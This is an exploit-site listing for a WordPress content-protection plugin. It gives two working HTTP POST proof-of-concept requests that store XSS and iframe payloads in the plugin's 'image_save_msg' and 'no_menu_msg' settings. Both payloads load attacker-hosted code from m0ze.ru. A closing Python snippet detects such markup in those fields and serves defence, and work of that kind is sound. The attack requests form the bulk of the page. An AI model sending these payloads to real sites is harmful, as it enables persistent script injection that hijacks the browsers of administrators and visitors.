## https://sploitus.com/exploit?id=WPEX-ID:C722F8D0-F86B-41C2-9F1F-48E475E22864
### -- [ PoC #1 | Authenticated Persistent XSS & XFS | Image saving disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E&CTRLS=1&cmenu=1&no_menu_msg=PoC+by+m0ze&Save_Options=++Update+Options++



### -- [ PoC #2 | Authenticated Persistent XSS & XFS | Context menu disabled message text: ]

[!] POST /wp-admin/options-general.php?page=Prevent_Content_Copy_and_Image_Save.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 234
Cookie: [admin cookies]

select=1&CTRLA=1&CTRLC=1&CTRLX=1&CTRLV=1&CTRLINPUT=1&saveimg=1&image_save_msg=PoC+by+m0ze&CTRLS=1&cmenu=1&no_menu_msg=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E&Save_Options=++Update+Options++
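
A detection-side check for the two requests above, as an added example that is not part of the original PoC: it decodes a form-encoded body posted to the plugin's settings page and reports when `image_save_msg` or `no_menu_msg` carries HTML markup. The field names come from the requests on this page; the function names, the sample bodies and the `example.invalid` host are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Free-text settings fields named in the two requests on this page.
MESSAGE_FIELDS = ("image_save_msg", "no_menu_msg")

# Characters that let a stored value break out of an HTML attribute or text
# node. A plain double quote also matches, so treat a hit as a triage flag.
MARKUP = re.compile(r'[<>"]')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_fields(body: str, fields=MESSAGE_FIELDS) -> dict:
    """Return {field: decoded value} for message fields carrying markup."""
    hits = {}
    # parse_qsl performs the first round of URL-decoding itself.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name not in fields:
            continue
        decoded = fully_decode(value)
        if MARKUP.search(decoded):
            hits[name] = decoded
    return hits


# Constructed sample bodies (example.invalid is a placeholder host).
BENIGN = ("select=1&saveimg=1&image_save_msg=Image+saving+is+disabled"
          "&cmenu=1&no_menu_msg=Context+menu+disabled")
TAG_IN_IMAGE_MSG = ("select=1&image_save_msg=%22%3E%3Cscript+src%3Dhttps%3A%2F%2F"
                    "example.invalid%2Fa.js%3E%3C%2Fscript%3E&no_menu_msg=ok")
DOUBLE_ENCODED = ("no_menu_msg=%2522%253E%253Ciframe%2520src%253Dhttps%253A%252F%252F"
                  "example.invalid%252Fx.html%253E")

if __name__ == "__main__":
    for label, body in [("benign", BENIGN), ("tag", TAG_IN_IMAGE_MSG),
                        ("double-encoded", DOUBLE_ENCODED)]:
        print(label, suspicious_fields(body))
```

The same test applied to the values already stored for these two options shows whether a site has been modified this way.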